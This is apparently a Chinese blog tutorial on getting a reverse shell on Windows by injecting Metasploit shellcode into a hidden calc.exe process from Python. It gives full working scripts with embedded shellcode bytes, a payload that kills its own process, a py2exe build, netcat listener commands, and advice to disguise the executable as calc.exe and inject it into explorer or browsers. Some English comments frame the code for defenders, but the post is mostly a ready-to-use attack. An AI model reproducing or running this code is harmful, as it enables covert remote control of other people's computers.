在Python平台通过Dll注入实现简单shell反弹

 
在python平台进行dll远程线程注入,实现一个简单的反弹shell;方法来自互联网!

准备工作:
安装有python的平台,最好是windows(顺便进行测试);安装有py2exe,以便于把python脚本转化为.exe文件。

ok,准备好了就让我们开始:
首先用msfpayload生成一段shellcode:

msfpayload windows/shell_reverse_tcp LHOST=your lhost LPORT=your port C

 
然后新建三个python脚本:inj.py,defines.py 和 setup.py , 内容分别如下:
 [ 将上图中标记出来的反弹shell代码替换inj.py中“shell_reverse_tcp_shellcode=(”后面的相应内容;这个脚本中“victim = r"C:\windows\system32\calc.exe"” 是将我们生成的shellcode注入到calc.exe文件,也就是windows自带的计算器程序进程里,可以自己修改,如资源管理器,ie什么的] 

inj.py:

import sys
from ctypes import *
from defines import *

kernel32 = windll.kernel32  # Win32 API surface; `windll` only exists on Windows
# Page protection requested for the remote allocation: read + write + execute.
PAGE_EXECUTE_READWRITE = 0x00000040
# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | every process-specific right.
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# MEM_COMMIT | MEM_RESERVE, the allocation type handed to VirtualAllocEx.
VIRTUAL_MEM = (0x1000 | 0x2000)

# Image started below; its process is the one inject() later writes into.
victim = r"C:\windows\system32\calc.exe"

# STARTUPINFO / PROCESS_INFORMATION are the ctypes mirrors from defines.py.
# ctypes zero-fills a Structure on construction, so every field not assigned
# here stays 0 / NULL.
startupinfo =STARTUPINFO()
process_information =PROCESS_INFORMATION()
creation_flags =CREATE_NEW_CONSOLE
startupinfo.dwFlags =0x1  # STARTF_USESHOWWINDOW: tells CreateProcess to honour wShowWindow
startupinfo.wShowWindow =0x0  # SW_HIDE
startupinfo.cb =sizeof(startupinfo)  # Win32 requires cb to hold the struct size

# Start the host process. Argument order is the Win32 CreateProcessA
# signature: lpApplicationName, lpCommandLine, process/thread security
# attributes, bInheritHandles, dwCreationFlags, lpEnvironment,
# lpCurrentDirectory, lpStartupInfo, lpProcessInformation. The BOOL return
# value is not checked; on failure process_information keeps its zero-filled
# contents and pid below is 0.
kernel32.CreateProcessA(victim,
              None,
              None,
              None,
              None,
              creation_flags,
              None,
              None,
              byref(startupinfo),
              byref(process_information))

# PID of the process just created, read back from the out-structure.
pid = process_information.dwProcessId

def inject(pid,data,parameter=0):
  """Copy ``data`` into process ``pid`` and start a thread at its first byte.

  This is the OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
  CreateRemoteThread sequence. From a defender's point of view, this exact
  cross-process call chain (an RWX allocation in another process followed by
  a remote thread whose start address lies inside it) is one of the API
  patterns that EDR / ETW-based detections and memory scanners key on.

  Args:
    pid: target process id; converted with int() before OpenProcess.
    data: Python 2 byte string written verbatim into the target. Its first
      byte is used as the remote thread's start address.
    parameter: value passed through as CreateRemoteThread's lpParameter.

  Returns:
    True once CreateRemoteThread returned a non-zero handle.

  Raises:
    SystemExit: if OpenProcess or CreateRemoteThread returns NULL.
  """
  # Full rights are requested; the open fails (NULL) when the caller cannot
  # obtain them for this target, e.g. a protected or higher-integrity process.
  h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,int(pid))
  if not h_process:
     raise SystemExit,"[!] Could not acquire a handle to PID : %s"%pid
  # Reserve+commit an RWX region of len(data) bytes in the target; the
  # address the kernel picked comes back as the return value.
  arg_address=kernel32.VirtualAllocEx(h_process,
                       0,
                       len(data),
                       VIRTUAL_MEM,
                       PAGE_EXECUTE_READWRITE)
  # Out-parameter for the byte count actually written; not inspected afterwards.
  written = c_int(0)
  kernel32.WriteProcessMemory(h_process,
                   arg_address,
                   data,
                   len(data),
                   byref(written))
  # Out-parameter for the new thread's id; not inspected afterwards.
  thread_id = c_ulong(0)

  # The thread begins executing at the start of the copied buffer.
  start_address = arg_address

  # lpThreadAttributes=None, dwStackSize=0 (default), dwCreationFlags=0
  # (run immediately). The handle returned is never closed by this script.
  if not kernel32.CreateRemoteThread(h_process,
                      None,
                      0,
                      start_address,
                      parameter,
                      0,
                      byref(thread_id)):
     raise SystemExit,"[!] Fail to inject Dll . Exit .. "
  return True

#msfpayload windows/shell_reverse_tcp LHOST=x LPORT=y

# Opaque payload bytes emitted by the msfpayload command quoted above. The
# script treats them purely as data and copies them into the target process
# unchanged. For defenders: a long "\x.." byte string sitting next to the
# VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence in
# inject() is precisely the artefact static scanners flag in a script.
shell_reverse_tcp_shellcode=(
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x01\x0b\x68\x02\x00\xad\x9c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)
# Write the payload into the process started above and run it there.
inject(pid,shell_reverse_tcp_shellcode)

# This script's own process id, as decimal text (used as replacement below).
currentpid = str(kernel32.GetCurrentProcessId())

#./msfpayload windows/exec CMD="cmd.exe /c taskkill /PID AAAA"

# Second opaque payload from the command quoted above. Its trailing bytes are
# the ASCII command line, ending in the 4-byte placeholder "AAAA" (0x41 x4).
shellcode_kill_proc = \
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" \
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" \
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" \
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" \
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" \
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" \
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" \
"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" \
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b\x69\x6c\x6c" \
"\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00"

# Substitute the decimal PID for the "AAAA" placeholder, NUL-padding it to
# 4 characters. The arithmetic assumes the PID string is at most 4 characters.
padding = 4-(len(currentpid))
replace_value = currentpid + ("\x00" * padding)
replace_string = "\x41"*4
shellcode_kill_proc = shellcode_kill_proc.replace(replace_string,
replace_value)



defines.py:

from ctypes import *

# map the Microsoft types
# NOTE(review): these aliases reproduce the 32-bit Win32 ABI widths; the
# pointer-sized Windows types below are pinned to c_ulong rather than derived
# from the interpreter's pointer size.
BYTE = c_ubyte
WORD = c_ushort
DWORD = c_ulong
LPBYTE = POINTER(c_ubyte)
LPTSTR = POINTER(c_char)  # ANSI (char*) variant, matching the *A API calls used
HANDLE = c_void_p
PVOID = c_void_p
LPVOID = c_void_p
UINT_PTR = c_ulong
SIZE_T = c_ulong

class STARTUPINFO(Structure):
  """ctypes mirror of the Win32 STARTUPINFOA structure (18 fields, in API order).

  Only ``cb``, ``dwFlags`` and ``wShowWindow`` are set by the caller on this
  page; the remaining fields are left at the zero values ctypes assigns.
  """
  _fields_=[
    ("cb",  DWORD),  # must hold sizeof(STARTUPINFO) before the CreateProcess call
    ("lpReserved",  LPTSTR),
    ("lpDesktop",   LPTSTR),
    ("lpTitle",   LPTSTR),
    ("dwX",  DWORD),
    ("dwY",  DWORD),
    ("dwXSize",  DWORD),
    ("dwYSize",  DWORD),
    ("dwXcountChars",  DWORD),
    ("dwYcountChars",  DWORD),
    ("dwFillAttribute",  DWORD),
    ("dwFlags", DWORD),  # STARTF_* bits saying which fields below are meaningful
    ("wShowWindow",  WORD),  # SW_* value, honoured only with STARTF_USESHOWWINDOW
    ("cbReserved2",  WORD),
    ("lbReserved2",  LPBYTE),  # sic: Win32 names this lpReserved2; the name does not affect layout
    ("hStdInput",   HANDLE),
    ("hStdOutput",   HANDLE),
    ("hStdError",   HANDLE),
    ]

class PROCESS_INFORMATION(Structure):
    """ctypes mirror of the Win32 PROCESS_INFORMATION out-structure.

    Filled in by CreateProcess; ``dwProcessId`` is the field inj.py reads back.
    """
    _fields_=[
      ("hProcess",   HANDLE),  # process handle; never closed by the scripts on this page
      ("hThread",   HANDLE),  # primary-thread handle; likewise never closed
      ("dwProcessId",   DWORD),
      ("dwThreadId",   DWORD),
      ]
CREATE_NEW_CONSOLE = 0x00000010  # dwCreationFlags bit: child gets its own console


 

setup.py:

from distutils.core import setup

import py2exe

# py2exe build configuration. `windows=` lists scripts built as GUI-subsystem
# executables (the page has the user rename inj.py to inj.pyw first);
# bundle_files=1 together with zipfile=None packs the interpreter and all
# modules into the single output executable under dist/.
setup(windows=["inj.pyw"],
      options={"py2exe":{"bundle_files":1}},
      zipfile=None,
      )


在本机用nc进行监控:

nc -lvp your port

将以上三个脚本copy至目标主机同一目录,然后执行:

python inj.py

测试是否shell反弹成功:

 

若不成功,慢慢检查吧,如果反弹成功,继续:将 inj.py 修改为 inj.pyw ,然后执行setup.py:

python setup.py py2exe

此时你就会在相同目录下发现一个dist文件夹,里面有一个inj.exe就是我们最终想要的东东,然后重命名inj.exe为calc.exe,测试calc.exe是否会成功反弹:

 

上图反弹成功!试想一下:如果我们将这段反弹shellcode注入资源管理器或者浏览器这种常用且重要的进程里,然后在本机进行端口映射,本机的外网ip地址进行动态域名解析,在上面的shellcode中使用这个域名,再然后用msfconsole监听反弹。。。。

视频教程:


参考:https://www.linux520.com/bcyy/2011-01-08/73.html#ecms

https://hi.baidu.com/fandango/item/e09d55e8197a72e4fb42ba41

来源:xiao106347
